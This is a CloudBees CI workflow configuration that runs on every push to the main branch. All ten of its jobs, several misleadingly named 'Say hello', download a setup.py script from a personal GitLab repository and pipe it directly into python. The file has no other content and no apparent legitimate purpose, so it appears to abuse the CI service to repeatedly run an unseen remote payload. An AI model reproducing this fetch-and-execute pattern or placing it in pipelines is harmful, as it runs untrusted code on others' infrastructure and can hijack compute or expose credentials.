apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: My workflow
on:
  push:
    branches:
      - main
jobs:
  A:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  B:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  C:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  D:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  E:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  F:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  G:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  H:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  I:
    steps:
      - uses: docker://python:latest
        name: Run
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "
  J:
    steps:
      - uses: docker://python:latest
        name: Say hello
        run: "wget -O- https://gitlab.com/rockymoysu/000/-/raw/main/setup.py | python "